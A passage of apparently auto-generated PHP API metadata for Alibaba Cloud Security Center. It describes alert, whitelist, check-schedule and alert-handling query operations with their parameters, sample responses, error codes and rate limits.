\\"REINFORCE_WEB_LOCK\\"\\n }\\n ]\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n \\n 40\\n SS_ALARM\\n \\n 您有6,160条安全告警,影响39台资产\\n ALARM_HIGH\\n 存在未处理的高危告警事件\\n \\n \\n 您有88条安全告警,影响25台资产\\n ALARM_MEDIUM\\n 存在未处理的中危告警事件\\n \\n \\n 您有1条安全告警,影响1台资产\\n ALARM_LOW\\n 存在未处理的低危告警事件\\n \\n \\n \\n 12\\n SS_VUL\\n \\n 您有34条漏洞,影响19台服务器\\n VUL_WIN\\n 存在未修复的Windows主机漏洞\\n \\n \\n 您有448条漏洞,影响68台服务器\\n VUL_LINUX\\n 存在未修复的Linux主机漏洞\\n \\n \\n 存在11个未检测的应急漏洞\\n VUL_EMR_UNCHECK\\n 存在未检测的应急漏洞\\n \\n \\n 存在1个未修复的应急漏洞\\n VUL_EMR_UNFIX\\n 存在未修复的应急漏洞\\n \\n \\n \\n 20\\n SS_HC\\n \\n 您有 17 台互联网可访问的服务器存在弱口令,可能已被黑客入侵,建议尽快加强密码强度\\n HC_WEAK_EXPLOIT_WARN\\n 存在公网暴露的弱口令风险\\n \\n \\n 您有 18 台服务器存在弱口令,建议尽快更换密码,同时加强密码强度\\n HC_WEAK_PASSWORD_WARN\\n 存在弱口令风险\\n \\n \\n 您有 105 台服务器存在安全合规配置风险,建议根据加固建议和业务需求进行修复加固\\n HC_OTHER_WARN\\n 存在安全配置风险\\n \\n \\n \\n 30\\n SS_AK\\n \\n 存在1个AK泄漏\\n ACCESSKEY_LEAK\\n 存在AK泄漏风险\\n \\n \\n \\n 28\\n SS_CLOUD_HC\\n \\n \\n CLOUD_HC_ACCOUNT_DOUBLE_CHECK\\n 主账号未开启双因素认证,账号存在安全风险\\n \\n \\n 存在5个高风险云产品配置检查项\\n CLOUD_HC_HIGH_LEVEL\\n 云产品配置存在高危风险\\n \\n \\n 存在16个中低危风险云产品配置检查项\\n CLOUD_HC_OTHER_LEVEL\\n 云产品配置存在中低危风险\\n \\n \\n \\n 5\\n OTHER\\n \\n 您有3,387次网络攻击\\n OTHER_ATTACH\\n 存在攻击事件\\n \\n \\n 15\\n 676F80E3-4B3F-43DA-9CBB-5FF79F202AA2\\n","errorExample":""}]', 'title' => 'Query Security Risk Handling Suggestions Details', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecureSuggestion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecureSuggestion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSecurityCheckScheduleConfig' => [ 'summary' => 'Queries the day of a week when custom check tasks are performed and the time range during which the custom check tasks are performed.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '48D2E9A9-A1B0-4295-B727-0995757C47E9', 'title' => ''], 'RiskCheckJobConfig' => [ 'description' => 'The configurations of custom check tasks.'."\n", 'type' => 'object', 'properties' => [ 'EndTime' => ['description' => 'The time range during which check tasks end. Valid values:'."\n" ."\n" .'* **6**: 00:00 to 06:00'."\n" .'* **12**: 06:00 to 12:00'."\n" .'* **18**: 12:00 to 18:00'."\n" .'* **24**: 18:00 to 24:00'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'StartTime' => ['description' => 'The time range during which check tasks start. Valid values:'."\n" ."\n" .'* **0**: 00:00 to 06:00'."\n" .'* **6**: 06:00 to 12:00'."\n" .'* **12**: 12:00 to 18:00'."\n" .'* **18**: 18:00 to 24:00'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '6', 'title' => ''], 'DaysOfWeek' => ['description' => 'The day of the week when the check tasks are performed. Multiple days can be specified. Multiple days are separated by commas (,).'."\n" ."\n" .'* **1**: Monday'."\n" .'* **2**: Tuesday'."\n" .'* **3**: Wednesday'."\n" .'* **4**: Thursday'."\n" .'* **5**: Friday'."\n" .'* **6**: Saturday'."\n" .'* **7**: Sunday'."\n", 'type' => 'string', 'example' => '1,2,3', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"48D2E9A9-A1B0-4295-B727-0995757C47E9\\",\\n \\"RiskCheckJobConfig\\": {\\n \\"EndTime\\": 12,\\n \\"StartTime\\": 6,\\n \\"DaysOfWeek\\": \\"1,2,3\\"\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n 48D2E9A9-A1B0-4295-B727-0995757C47E9\\n \\n 12\\n 6\\n 1,2,3\\n \\n","errorExample":""}]', 'title' => 'DescribeSecurityCheckScheduleConfig', 'description' => 'This operation is phased out. You can use the GetCheckConfig operation.'."\n", 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityCheckScheduleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecurityCheckScheduleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSecurityEventMarkMissList' => [ 'summary' => 'Queries the auto-whitelist rules for security alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '125.210.XX.XX', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The alert event name (child class).', 'type' => 'string', 'required' => false, 'example' => 'Login with unusual location', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset search keyword. You can enter the IP address, public IP address, private IP address, or asset name for fuzzy matching.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of whitelist rules to display on each page in a paged query. Default value: **20**, which indicates that 20 whitelist rules are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of whitelist rules to display on each page in a paged query. Default value: **20**, which indicates that 20 whitelist rules are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of whitelist rules returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'Count' => ['description' => 'The number of whitelist rules on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The list of whitelist rules.', 'type' => 'array', 'items' => [ 'description' => 'The whitelist rule information.', 'type' => 'object', 'properties' => [ 'EventName' => ['description' => 'The alert event name (child class).', 'type' => 'string', 'example' => 'Login with unusual location', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'EventNameOriginal' => ['description' => 'The alert event name (parent class).', 'type' => 'string', 'example' => 'login_common_location', 'title' => ''], 'AliUid' => ['description' => 'The user ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '176618589410****', 'title' => ''], 'FieldValue' => ['description' => 'The whitelist value.', 'type' => 'string', 'example' => 'root', 'title' => ''], 'InstanceId' => ['description' => 'The server instance ID.', 'type' => 'string', 'example' => 'rm-bp1e8t4q15sr3****', 'title' => ''], 'Field' => ['description' => 'The whitelist field.', 'type' => 'string', 'example' => 'type', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'FiledAliasName' => ['description' => 'The alias of the whitelist field.', 'type' => 'string', 'example' => 'Logon Time', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'Operate' => ['description' => 'The operator. Valid values:'."\n" ."\n" .'- **contains**: contains'."\n" .'- **notContains**: does not contain'."\n" .'- **strEqual**: equals'."\n" .'- **strNotEqual**: does not equal'."\n" .'- **regex**: regular expression.', 'type' => 'string', 'example' => 'contains', 'title' => ''], 'EventTypeOriginal' => ['description' => 'The alert event type (parent class).', 'type' => 'string', 'example' => 'login_common_location', 'title' => ''], 'EventType' => ['description' => 'The alert event type (child class).', 'type' => 'string', 'example' => 'Unusual Logon', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'Id' => ['description' => 'The ID of the alert whitelist rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '104037', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query alert whitelist rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventMarkMissList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecurityEventMarkMissList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 200,\\n \\"Count\\": 9\\n },\\n \\"List\\": [\\n {\\n \\"EventName\\": \\"Login with unusual location\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"EventNameOriginal\\": \\"login_common_location\\",\\n \\"AliUid\\": 0,\\n \\"FieldValue\\": \\"root\\",\\n \\"InstanceId\\": \\"rm-bp1e8t4q15sr3****\\",\\n \\"Field\\": \\"type\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"FiledAliasName\\": \\"Logon Time\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"Operate\\": \\"contains\\",\\n \\"EventTypeOriginal\\": \\"login_common_location\\",\\n \\"EventType\\": \\"Unusual Logon\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"Id\\": 104037\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeSecurityEventOperationStatus' => [ 'summary' => 'Queries the alert events that are triggered by the same IP address rule or of the same alert type as a specific alert event if you want to handle the specific alert event in batch operation mode.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task that handles the alert events.'."\n" ."\n" .'> You must specify at least one of the TaskId and SecurityEventIds parameters.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '12121', 'title' => ''], ], [ 'name' => 'SecurityEventIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the alert events.'."\n" ."\n" .'> You must specify at least one of the TaskId and SecurityEventIds parameters.'."\n", 'type' => 'array', 'items' => ['description' => 'The IDs of the alert events.'."\n" ."\n" .'> You must specify at least one of the TaskId and SecurityEventIds parameters.'."\n", 'type' => 'string', 'required' => false, 'example' => '12315', 'title' => ''], 'required' => true, 'example' => '["909361"]', 'maxItems' => 100, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '1683940A-E4AE-4473-8C40-F4075434B76B', 'title' => ''], 'SecurityEventOperationStatusResponse' => [ 'description' => 'The information about the task that handles the alert events.'."\n", 'type' => 'object', 'properties' => [ 'TaskStatus' => ['description' => 'The status of the task that handles the alert events. Valid values:'."\n" ."\n" .'* **Processing**: The task is running.'."\n" .'* **Success**: The task is successful.'."\n" .'* **Failure**: The task failed.'."\n" .'* **Pending**: The task is pending.'."\n", 'type' => 'string', 'example' => 'Success', 'title' => ''], 'SecurityEventOperationStatuses' => [ 'description' => 'An array consisting of the status of the alert events handled by the task.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The handling status of the alert event. Valid values:'."\n" ."\n" .'* **Processing**: The alert event is being handled.'."\n" .'* **Success**: The alert event is handled.'."\n" .'* **Failed**: The alert event failed to be handled.'."\n", 'type' => 'string', 'example' => 'Success', 'title' => ''], 'SecurityEventId' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'string', 'example' => '12321', 'title' => ''], 'ErrorCode' => ['description' => 'The code that indicates the handling result of the alert event.'."\n", 'type' => 'string', 'example' => 'ignore.Success', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'OperationTaskNotExists', 'errorMessage' => 'The specified operation task does not exist', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"1683940A-E4AE-4473-8C40-F4075434B76B\\",\\n \\"SecurityEventOperationStatusResponse\\": {\\n \\"TaskStatus\\": \\"Success\\",\\n \\"SecurityEventOperationStatuses\\": [\\n {\\n \\"Status\\": \\"Success\\",\\n \\"SecurityEventId\\": \\"12321\\",\\n \\"ErrorCode\\": \\"ignore.Success\\"\\n }\\n ]\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n 1683940A-E4AE-4473-8C40-F4075434B76B\\n \\n Success\\n \\n Success\\n 12321\\n ignore.Success\\n \\n \\n","errorExample":""}]', 'title' => 'DescribeSecurityEventOperationStatus', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventOperationStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecurityEventOperationStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSecurityEventOperations' => [ 'summary' => 'Queries the operations that you can perform to handle an alert.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92191', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'SecurityEventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event that you want to handle.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '61352054', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'B7A2000F-497E-5DA0-B14D-615CD410DD7E', 'title' => ''], 'SecurityEventOperationsResponse' => [ 'description' => 'The operations that are performed to handle the alert.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The operation that is performed to handle the alert.'."\n", 'type' => 'object', 'properties' => [ 'OperationParams' => ['description' => 'The configuration of the operation that is performed to handle the alert.'."\n" ."\n" .'> If the value of the **OperationCode** parameter is **kill_and_quara** or **block_ip**, the OperationParams parameter is required. If the value of the **OperationCode** parameter is a different value, the OperationParams parameter can be left empty.'."\n", 'type' => 'string', 'example' => '{"expireTime":1641566807783}', 'title' => ''], 'OperationCode' => ['description' => 'The operation that is performed to handle the alert. Valid values:'."\n" ."\n" .'* **block_ip**: blocks the source IP address.'."\n" .'* **advance_mark_mis_info**: adds the alert to the whitelist.'."\n" .'* **ignore**: ignores the alert.'."\n" .'* **manual_handled**: marks the alert as manually handled.'."\n" .'* **kill_process**: terminates the malicious process.'."\n" .'* **cleanup**: performs in-depth virus detection and removal.'."\n" .'* **kill_and_quara**: terminates the malicious process and quarantines the source file.'."\n" .'* **disable_malicious_defense**: disables the malicious behavior defense feature.'."\n" .'* **client_problem_check**: performs troubleshooting.'."\n" .'* **quara**: quarantines the source file of the malicious process.'."\n" .'* **defense_mark_mis_info**: enables the precise defense feature but disables the notification feature.'."\n" .'* **rm_defense_mark_mis_info**: enables the notification feature.'."\n" .'* **rm_mark_mis_info**: removes the alert from the whitelist.'."\n" .'* **cancle_manual**: cancels marking the alert as manually handled.'."\n", 'type' => 'string', 'example' => 'advance_mark_mis_info', 'title' => ''], 'UserCanOperate' => ['description' => 'Indicates whether you can handle the alert in the current edition of Security Center. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'MarkField' => [ 'description' => 'The configurations that are used when the value of the OperationCode parameter is **advance_mark_mis_info**.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The configuration that is used when the value of the OperationCode parameter is **advance_mark_mis_info**.'."\n", 'type' => 'object', 'properties' => [ 'MarkMisType' => ['description' => 'The operation that is used in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'FiledName' => ['description' => 'The field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'gmtModified', 'title' => ''], 'FiledAliasName' => ['description' => 'The alias of the field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'file path', 'title' => ''], 'MarkMisValue' => ['description' => 'The value of the field that is used in the whitelist rule.'."\n", 'type' => 'string', 'example' => '2022-04-25 10:11:04', 'title' => ''], 'Uuid' => ['title' => '', 'description' => 'The UUID of the server on which the alert event is detected.'."\n", 'type' => 'string', 'example' => '3d6b4a75-c28f-447b-9142-38f6252c****'], 'SupportedMisType' => [ 'description' => 'An array consisting of the operations that are supported by the method to add the alert event to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The operation that is used and can be modified in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'MarkFieldsSource' => [ 'description' => 'The configuration items that can be used when the value of the OperationCode parameter is advance_mark_mis_info.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The configuration item that can be used when the value of the OperationCode parameter is advance_mark_mis_info.'."\n", 'type' => 'object', 'properties' => [ 'FiledName' => ['description' => 'The field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'gmtModified', 'title' => ''], 'FiledAliasName' => ['description' => 'The alias of the field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'file path', 'title' => ''], 'MarkMisValue' => ['description' => 'The value of the field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'SupportedMisType' => [ 'description' => 'An array consisting of the operations that are supported by the method to add the alert event to the whitelist.'."\n", 'type' => 'array', 'items' => ['description' => 'The operation that is supported in the whitelist rule. Valid values:'."\n" ."\n" .'* **contains**: contains'."\n" .'* **notContains**: does not contain'."\n" .'* **regex**: regular expression'."\n" .'* **strEqual**: equals'."\n" .'* **strNotEqual**: does not equal'."\n", 'type' => 'string', 'example' => 'contains', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'MappingMarkFields' => [ 'description' => 'The objects on which the operations are performed. This parameter is required when you add the alert to the whitelist by configuring precise defense rules.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The object on which the operation is performed. This parameter is required when you add the alert to the whitelist by configuring precise defense rules.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the field that is added to the whitelist.'."\n", 'type' => 'string', 'example' => 'pid', 'title' => ''], 'Value' => ['description' => 'The value of the field that is added to the whitelist.'."\n", 'type' => 'string', 'example' => '1791', 'title' => ''], 'ShowValue' => ['description' => 'The display name of the field that is added to the whitelist.'."\n", 'type' => 'string', 'example' => '1791', 'title' => ''], 'FillType' => ['description' => 'Indicates whether the value of the field can be changed.'."\n" ."\n" .'* **CUSTOM**: The value of the field can be changed.'."\n" .'* **SYSTEM**: The value of the field cannot be changed.'."\n", 'type' => 'string', 'example' => 'CUSTOM', 'title' => ''], 'Required' => ['description' => 'Indicates whether the parameter is required. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'ShowName' => ['description' => 'The display name of the field that can be used in the whitelist rule.'."\n", 'type' => 'string', 'example' => 'pid', 'title' => ''], 'MinLength' => ['description' => 'The minimum length of the field that is added to the whitelist.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1024', 'title' => ''], 'MaxLength' => ['description' => 'The maximum length of the field that is added to the whitelist.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2048', 'title' => ''], 'Description' => ['description' => 'The description of the field that is added to the whitelist.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'SecurityEventNotExists', 'errorMessage' => 'Security event not exists.', 'description' => ''], ['errorCode' => 'MissingSecurityEventId', 'errorMessage' => 'SecurityEventId is mandatory for this action.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => '-100', 'errorMessage' => 'The service is unavailable, please try again later.', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"B7A2000F-497E-5DA0-B14D-615CD410DD7E\\",\\n \\"SecurityEventOperationsResponse\\": [\\n {\\n \\"OperationParams\\": \\"{\\\\\\"expireTime\\\\\\":1641566807783}\\",\\n \\"OperationCode\\": \\"advance_mark_mis_info\\",\\n \\"UserCanOperate\\": false,\\n \\"MarkField\\": [\\n {\\n \\"MarkMisType\\": \\"contains\\",\\n \\"FiledName\\": \\"gmtModified\\",\\n \\"FiledAliasName\\": \\"file path\\",\\n \\"MarkMisValue\\": \\"2022-04-25 10:11:04\\",\\n \\"Uuid\\": \\"3d6b4a75-c28f-447b-9142-38f6252c****\\",\\n \\"SupportedMisType\\": [\\n \\"contains\\"\\n ]\\n }\\n ],\\n \\"MarkFieldsSource\\": [\\n {\\n \\"FiledName\\": \\"gmtModified\\",\\n \\"FiledAliasName\\": \\"file path\\",\\n \\"MarkMisValue\\": \\"contains\\",\\n \\"SupportedMisType\\": [\\n \\"contains\\"\\n ]\\n }\\n ],\\n \\"MappingMarkFields\\": [\\n {\\n \\"Name\\": \\"pid\\",\\n \\"Value\\": \\"1791\\",\\n \\"ShowValue\\": \\"1791\\",\\n \\"FillType\\": \\"CUSTOM\\",\\n \\"Required\\": true,\\n \\"ShowName\\": \\"pid\\",\\n \\"MinLength\\": 1024,\\n \\"MaxLength\\": 2048,\\n \\"Description\\": \\"test\\"\\n }\\n ]\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"","errorExample":""}]', 'title' => 'DescribeSecurityEventOperations', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityEventOperations'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSecurityEventOperations', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSecurityStatInfo' => [ 'summary' => 'Queries the statistics of each security check item and the daily statistics in the security check item trend chart.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The ID of the member account in the resource folder. This parameter is used by the multi-account security management feature of Security Center to query the security information of specified member accounts.', 'type' => 'string', 'required' => false, 'example' => '12345', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the query is successful. Valid values:'."\n" .'- **true**: 